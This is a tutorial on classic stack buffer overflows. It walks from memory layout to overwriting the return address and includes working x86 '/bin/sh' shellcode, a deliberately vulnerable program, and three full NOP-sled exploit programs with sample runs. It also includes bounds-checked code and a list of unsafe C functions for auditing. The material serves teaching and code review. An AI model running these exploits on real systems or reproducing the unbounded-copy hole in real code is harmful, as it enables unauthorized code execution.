Learn about Buffer Overflow from scratch


Author: Wendy

In this guide, we will discuss what a buffer overflow is and how it can be exploited. You need to understand C and assembly language. Familiarity with GDB is helpful but not required.

A process's memory is divided into three regions:

1. Text region (program area)

This region stores the program's instructions. It is therefore marked read-only, and any attempt to write to it causes an error.

2. Data region

This region stores static variables. Its size can be changed with the brk() system call.

3. Stack

A stack has a special property: the last item placed on it is the first to be removed. In computer science this is called LIFO (last in, first out). Stacks are designed for functions and procedures. A procedure call alters the program's flow of execution, much like a jump. Unlike a jump, however, it returns to the point of the call once its instructions have finished. The return address is placed on the stack before the procedure is called.

The stack is also used to allocate a function's local variables dynamically, and to pass its parameters and return values.
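The LIFO behaviour described above can be illustrated with a small array-backed stack. This is only a sketch: the names int_stack, stack_push, stack_pop and STACK_CAPACITY are made up for the illustration, and a real call stack is managed by the CPU and compiler rather than by code like this.

```c
#include <assert.h>
#include <stddef.h>

#define STACK_CAPACITY 16  /* hypothetical fixed size for this sketch */

/* A tiny array-backed stack of ints; `top` counts the stored items. */
struct int_stack {
    int items[STACK_CAPACITY];
    size_t top;
};

/* Push a value; returns 0 on success, -1 if the stack is full. */
int stack_push(struct int_stack *s, int value) {
    assert(s != NULL);
    if (s->top == STACK_CAPACITY)
        return -1;
    s->items[s->top++] = value;
    return 0;
}

/* Pop the most recently pushed value into *out; returns -1 if empty. */
int stack_pop(struct int_stack *s, int *out) {
    assert(s != NULL && out != NULL);
    if (s->top == 0)
        return -1;
    *out = s->items[--s->top];
    return 0;
}
```

Pushing 1, 2, 3 and then popping three times yields 3, 2, 1: the last value in is the first one out.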

Return address and instruction pointer

The computer executes an instruction and keeps a pointer (the instruction pointer, IP) to the next one. When a function or procedure is called, the current instruction pointer is saved on the stack as the return address (RET). When the procedure finishes, RET is loaded back into IP and the program continues from the point where the call was made.

A buffer overflow

Let's use an example to illustrate a buffer overflow.

<++> buffer/example.c
#include <string.h>

int main(void) {
    char big_string[100];
    char small_string[50];
    /* Fill big_string with 100 copies of 0x41 ('A'). */
    memset(big_string, 0x41, 100);
    /* strcpy(char *to, char *from): copies with no bounds check */
    strcpy(small_string, big_string);
    return 0;
}
<--> end of example.c
 
This program uses two arrays. memset() fills the array big_string with the character 0x41 (= 'A'). The program then copies big_string into small_string. Obviously, small_string cannot hold 100 characters, so an overflow occurs.
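For contrast, here is a minimal sketch of a copy that respects the destination size. The helper name copy_bounded is an assumption made for this illustration. It relies on the standard snprintf(), which never writes more than the given number of bytes and returns the length the full string would have needed.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Copy src into dst without writing past dst_size bytes.
 * Returns 1 if the whole string fit, 0 if it was truncated. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    assert(dst != NULL && src != NULL && dst_size > 0);
    /* snprintf stores at most dst_size - 1 characters plus a NUL. */
    int needed = snprintf(dst, dst_size, "%s", src);
    return needed >= 0 && (size_t)needed < dst_size;
}
```

With a 50-byte destination and a 100-character source, the copy stops after 49 characters and the function reports truncation instead of overwriting the memory that follows the buffer.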

Next, let's look at the layout in memory:

[big_string] [small_string] [SFP] [RET]

During the overflow, both the saved stack frame pointer (SFP) and the return address (RET) are overwritten with 'A' characters. This means RET becomes 0x41414141 (0x41 is the hexadecimal value of 'A'). When the function returns, the instruction pointer is loaded with the overwritten RET, and the computer tries to execute the instruction at 0x41414141. This causes a segmentation fault, because that address lies outside the process's address space.
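The value 0x41414141 is what you get when a 4-byte slot is filled with the byte 0x41. The sketch below shows this; the function name word_of_repeated_byte is hypothetical, and a 4-byte return address is assumed, as on 32-bit x86.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Fill a 4-byte slot with one repeated byte and read it back as an integer.
 * All four bytes are equal, so the result does not depend on byte order. */
uint32_t word_of_repeated_byte(unsigned char byte) {
    uint32_t slot;
    assert(sizeof slot == 4);
    memset(&slot, byte, sizeof slot);
    return slot;
}
```

Calling word_of_repeated_byte(0x41) returns 0x41414141, the address the processor would try to jump to after the overflow in example.c.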

Exploiting the vulnerability

Now we know that we can change the normal flow of the program by overwriting RET. We can experiment with this: instead of overwriting RET with 'A' characters, we overwrite it with an address chosen for our purposes.

Arbitrary code execution

Now we need something for that address to point to, which will then be executed. In most cases we want to spawn a shell, although this is not the only option.

Before:
FFFFF BBBBBBBBBBBBBBBBBBBBBBBBB EEEE RRRR FFFFFFFFFF
B = the buffer
E = stack frame pointer
R = return address
F = other data
After:
FFFFF SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAFFFFFFFFF
S = shellcode
A = address pointing to the shellcode
F = other data

The C code to spawn a shell is as follows:

<++> buffer/shell.c
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    /* Replace this process with /bin/sh; exit() runs only if execve fails. */
    execve(name[0], name, NULL);
    exit(0);
}
<--> end of shell.c
 
We will not explain how to write shellcode here, because it requires a good deal of assembly knowledge and would take us away from the topic. In practice, plenty of ready-made shellcode is available. For those who want to know how it is produced, the steps are:

- Compile the program above with the -static flag.

- Open it in GDB and run the "disassemble main" command.

- Remove all unnecessary code.

- Rewrite it in assembly.

- Compile the result, open it in GDB, and run the "disassemble main" command.

- Use the x/bx command at the instruction addresses to retrieve the hex code.

Or you can use this code:

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Find the address

When we try to overflow the buffer of another program, the problem is finding the address of that buffer. The answer is that, on systems without address space layout randomization, the stack starts at the same address for every program. So as long as we know where the stack starts, we can try to guess the address of the buffer.

The following program prints its own stack pointer:

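<++> buffer/getsp.c
#include <stdio.h>

/* Leaves the stack pointer in EAX, which is the return-value register
   on 32-bit x86 (GCC inline assembly, AT&T syntax). */
unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

int main(void) {
    fprintf(stdout, "0x%lx\n", get_sp());
    return 0;
}
<--> end of getsp.c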
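The inline assembly in getsp.c works only on 32-bit x86 with GCC. A rough portable approximation, assuming that local variables live in the current stack frame, is to take the address of a local variable. The names approx_stack_address and print_stack_address are made up for this sketch.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Return the address of a local variable as an integer. A local normally
 * lives in the current stack frame, so this approximates the stack pointer. */
uintptr_t approx_stack_address(void) {
    volatile char marker = 0;
    return (uintptr_t)&marker;
}

/* Print the approximation in the same style as getsp.c. */
void print_stack_address(void) {
    uintptr_t addr = approx_stack_address();
    assert(addr != 0);
    printf("0x%jx\n", (uintmax_t)addr);
}
```

Running a program that calls print_stack_address() several times in separate processes is a quick check of the assumption in this section: if the printed value changes between runs, the system randomizes stack addresses and a fixed guess will not work.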

Try the following example:

<++> buffer/hole.c
#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[512];
    if (argc > 1)  /* otherwise we crash our little program */
        strcpy(buffer, argv[1]);  /* no bounds check: this is the hole */
    return 0;
}
<--> end of hole.c
<++> buffer/exploit1.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Leaves the stack pointer in EAX (32-bit x86, GCC inline assembly). */
unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    addr = get_sp() - offset;
    printf("Using address: 0x%lx\n", addr);

    /* Fill the whole buffer with the guessed address. */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* Copy the shellcode in just after the 4-byte "BUF=" prefix. */
    ptr += 4;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';

    /* Export the buffer as $BUF and start a shell that inherits it. */
    memcpy(buff, "BUF=", 4);
    putenv(buff);
    system("/bin/bash");
    return 0;
}
<--> end of exploit1.c

Now we can try to guess the offset. The program computes the address it uses as stack pointer - offset.

[hosts]$ exploit1 600
Using address: 0xbffff6c3
[hosts]$ ./hole $BUF
[hosts]$ exploit1 600 100
Using address: 0xbffffce6
[hosts]$ ./hole $BUF
Segmentation fault
etc.

As you can see, guessing this way is nearly hopeless, because we have to hit the exact address of our code. To increase our chances, we can place NOP (no-operation) instructions in front of the shellcode in the overflow buffer, so that we no longer have to guess the exact address. A NOP instruction does nothing except pass execution on to the next instruction. If the overwritten return address points anywhere into the string of NOPs, execution runs through them and then reaches our code.
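Why the NOP padding helps can be expressed as a simple range check. In the sketch below, lands_in_sled and its parameters are hypothetical names: a guess succeeds if it falls anywhere inside the padded region, whereas without padding the region is effectively one byte long.

```c
#include <assert.h>

/* Return 1 if the guessed address falls inside a run of sled_len bytes
 * starting at sled_start, 0 otherwise. */
int lands_in_sled(unsigned long guess,
                  unsigned long sled_start,
                  unsigned long sled_len) {
    assert(sled_len > 0);
    return guess >= sled_start && guess - sled_start < sled_len;
}
```

With sled_len equal to 1, only an exact guess passes the check. With a sled of 256 bytes, any of 256 consecutive addresses passes, which is the improvement the paragraph above describes.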

The content of the memory should be as follows:

FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSSSAAAAAAFFFFFFFFF

N = NOP

S = shellcode

A = address pointing to the shellcode

F = Other data
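The layout in the diagram can be drawn with placeholder letters instead of real bytes. This is only an illustration of the ordering: draw_layout is a made-up helper, and it writes the characters 'N', 'S' and 'A' where an actual buffer would hold NOPs, shellcode and addresses.

```c
#include <assert.h>
#include <string.h>

/* Write a layout diagram into out (out_size bytes including the NUL):
 * nop_len 'N' characters, then code_len 'S' characters, then 'A' to the end.
 * Returns 0 on success, -1 if the pieces do not fit. */
int draw_layout(char *out, size_t out_size, size_t nop_len, size_t code_len) {
    assert(out != NULL);
    if (out_size == 0 || nop_len > out_size - 1 ||
        code_len > out_size - 1 - nop_len)
        return -1;
    size_t total = out_size - 1;
    memset(out, 'A', total);              /* addresses fill the buffer first */
    memset(out, 'N', nop_len);            /* NOPs go at the front */
    memset(out + nop_len, 'S', code_len); /* shellcode follows the NOPs */
    out[total] = '\0';
    return 0;
}
```

For a 17-byte output buffer with nop_len 6 and code_len 4, the result is the string NNNNNNSSSSAAAAAA.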

We modify the original code accordingly:

<++> buffer/exploit2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Leaves the stack pointer in EAX (32-bit x86, GCC inline assembly). */
unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    addr = get_sp() - offset;
    printf("Using address: 0x%lx\n", addr);

    /* Fill the whole buffer with the guessed address. */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* Overwrite the first half with NOPs. */
    for (i = 0; i < bsize / 2; i++)
        buff[i] = NOP;

    /* Place the shellcode in the middle, right after the NOPs. */
    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';

    memcpy(buff, "BUF=", 4);
    putenv(buff);
    system("/bin/bash");
    return 0;
}
<--> end of exploit2.c

[hosts]$ exploit2 600
Using address: 0xbffff6c3
[hosts]$ ./hole $BUF
Segmentation fault
[hosts]$ exploit2 600 100
Using address: 0xbffffce6
[hosts]$ ./hole $BUF
# exit
[hosts]$

To improve the code further, we put the shellcode in an environment variable of its own and then overflow the buffer with the address of that variable. This increases our chances again. The putenv() call exports the shellcode into the environment.

<++> buffer/exploit3.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Leaves the stack pointer in EAX (32-bit x86, GCC inline assembly). */
unsigned long get_esp(void) {
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i, eggsize = DEFAULT_EGG_SIZE;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) eggsize = atoi(argv[3]);
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    addr = get_esp() - offset;
    printf("Using address: 0x%lx\n", addr);

    /* buff holds only the guessed address, repeated. */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* egg holds a long run of NOPs followed by the shellcode. */
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    /* Export the egg as $BUF and the address buffer as $RET. */
    memcpy(egg, "BUF=", 4);
    putenv(egg);
    memcpy(buff, "RET=", 4);
    putenv(buff);
    system("/bin/bash");
    return 0;
}
<--> end of exploit3.c
[hosts]$ exploit3 600
Using address: 0xbffff5d7
[hosts]$ ./hole $RET
# exit
[hosts]$

Finding buffer overflows

Of course, there is a more accurate way to find buffer overflows: read the program's source code. Because Linux is an open-source system, the source is easy to obtain.

Look for calls to library functions that do no bounds checking, such as:

strcpy(), strcat(), sprintf(), vsprintf(), scanf()

Other functions, such as getc(), getchar(), and strncat(), are dangerous when they are used incorrectly in a "while" loop.
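When reading source code, it helps to know what a correctly bounded loop looks like. The following is a minimal sketch of a while loop around getc() that checks the buffer size on every character. The function name read_line_bounded is an assumption for this example, not something from a particular program.

```c
#include <assert.h>
#include <stdio.h>

/* Read one line from fp into buf, never storing more than buf_size - 1
 * characters. Extra characters on the line are read and discarded.
 * Returns the number of characters stored. */
size_t read_line_bounded(FILE *fp, char *buf, size_t buf_size) {
    assert(fp != NULL && buf != NULL && buf_size > 0);
    size_t n = 0;
    int c;
    while ((c = getc(fp)) != EOF && c != '\n') {
        if (n < buf_size - 1)   /* the bounds check that unsafe loops omit */
            buf[n++] = (char)c;
    }
    buf[n] = '\0';
    return n;
}
```

A loop of the same shape without the `n < buf_size - 1` test is the kind of construct to look for: it keeps writing past the end of the buffer for as long as the input line continues.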
